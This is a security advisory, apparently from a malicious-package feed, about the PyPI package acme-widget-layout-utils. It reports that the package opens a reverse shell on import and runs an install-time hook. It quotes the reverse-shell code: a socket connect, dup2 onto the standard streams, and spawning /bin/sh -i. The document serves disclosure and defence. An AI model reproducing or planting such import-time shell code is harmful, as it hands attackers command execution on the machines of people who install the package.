Vulnerability
Malicious code in acme-widget-layout-utils (PyPI)
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (ff800752007d4e55ddc8172e04c8d75ac04d61b499cc58d97f016cd34d70d6c4)

On import, src/acme_widget_layout_utils/__init__.py executes a textbook reverse-shell pattern: it opens a TCP socket, duplicates the socket file descriptor onto stdin/stdout/stderr via os.dup2, and spawns `/bin/sh -i` through subprocess.call (lines 11-16: `_sock.connect(("127.0.0.1", 1)); os.dup2(_sock.fileno(), 0);...; subprocess.call(["/bin/sh", "-i"])`). The hardcoded destination 127.0.0.1:1 is intentionally unreachable in a default environment, but the code is a fully functional reverse shell: any environment that has a listener on that endpoint, that proxies loopback, or in which the package has been patched to redirect the connection receives an interactive shell with the importing process's privileges.

The package additionally writes a marker file `/tmp/pypi_install_hook_marker.txt` from a custom setup.py install cmdclass during `pip install`, so code runs at install time as well as at import time. It is published under a generic `widget-layout-utils` name even though its pyproject description acknowledges it is a 'pipeline hook probe' with no advertised utility. The name/purpose mismatch increases the risk of accidental installation. Shipping live reverse-shell code on public PyPI under a benign name is unsafe regardless of the author's stated 'security probe' intent.

## Source: kam193 (643a7c935e2bb063cea8baf36f13bca89572d1febbf0efdb05812ee09ddde4d8)

During import, the package starts a reverse shell.

---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-acme-widget-layout-utils
Reasons (based on the campaign):
- The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.